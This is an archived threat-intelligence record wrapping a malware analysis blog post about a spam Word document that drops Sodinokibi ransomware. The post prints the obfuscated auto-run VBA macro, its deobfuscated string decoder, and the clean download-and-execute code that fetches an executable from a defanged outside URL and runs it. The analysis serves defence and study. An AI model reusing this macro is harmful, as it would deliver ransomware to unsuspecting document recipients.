{
	"id": "747da90e-9e91-4a26-9ae5-1dc6949a1b8f",
	"created_at": "2026-04-06T00:15:42.347822Z",
	"updated_at": "2026-04-10T13:13:05.537879Z",
	"deleted_at": null,
	"sha1_hash": "3b2724de56b7cdc385197876d7315569315b3458",
	"title": "Sodinokibi Spam, CinaRAT, and Fake G DATA Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 52037,
	"plain_text": "Sodinokibi Spam, CinaRAT, and Fake G DATA Blog\r\nBy Karsten Hahn\r\nPublished: 2019-06-05 · Archived: 2026-04-05 13:06:35 UTC\r\nMost of the Macro code in the document looks innocent and is there to divert from the malicious code, which\r\nexecutes on Document_Open. The obfuscated VBA code uses long scrambled variable and function/sub names,\r\nencoded strings, junk parameters and conditions. The unaltered main code is below.\r\nSub docUmeNt_opeN()\r\nAïöJV39ª(0) = \"TwPgELNvMievP,~H\"\r\nAïöJV39ª(1) = \"S3v]hZFNe?N6l@fil?K9.J\\@ANT2p)Y_pIo5lel2iL7jc4Zqav_utuJpi=^ho}4+ndG0\"\r\nçê½Iâ¿® = ®M¿rº¥»¬¢(üDFW´³©¥nhEcu¬·Ñé(Z®»6û«¿KWi欷(0, -6491, -6012))) + üDFW´³©¥nhEcu¬·Ñé(\"\\j/?MtxaiT_ycD.pr\r\nCall NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnG\r\nCreateObject(üDFW´³©¥nhEcu¬·Ñé(Z®»6û«¿KWi欷(1, 5279, -6017))).Open (çê½Iâ¿®)\r\nEnd Sub\r\nThe string decoding function simply extracts every fourth letter from the string. Below is the deobfuscated\r\ndecoding function.\r\nFunction DecodeString(EncodedString) As String\r\n Dim SomeByteArray(1055) As Byte, AnotherByteArray() As Byte\r\n AnotherByteArray = StrConv(EncodedString, 128) ' vbFromUnicode\r\n For idx = 0 To UBound(AnotherByteArray) - 1\r\n If (idx Mod 4 = 0) Then\r\n SomeByteArray(arrayIndex) = AnotherByteArray(idx)\r\n arrayIndex = arrayIndex + 1\r\n End If\r\n Next idx\r\n DecodeString = Left(StrConv(SomeByteArray, 64), arrayIndex) ' 64 = vbUnicode\r\nEnd Function\r\nThe main code downloads Sodinokibi to TEMP\\Microsoft-Word.exe and executes it. It looks as follows after\r\ndeobfuscation.\r\nSub Document_Open()\r\n DownloadedFilePath = Environ(\"TEMP\") + \"\\Microsoft-Word.exe\"\r\n Call DownloadToFile(0, \"hxxp://blaerck.xyz/sabo.exe\", DownloadedFilePath, 0, 0)\r\n CreateObject(\"Shell.Application\").Open (DownloadedFilePath)\r\nEnd Sub\r\nThe downloaded file is this Sodinokibi version[3].\r\nhttps://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data\r\nPage 1 of 2\n\nSource: https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data\r\nhttps://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data"
	],
	"report_names": [
		"31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data"
	],
	"threat_actors": [],
	"ts_created_at": 1775434542,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.pdf",
		"text": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.txt",
		"img": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.jpg"
	}
}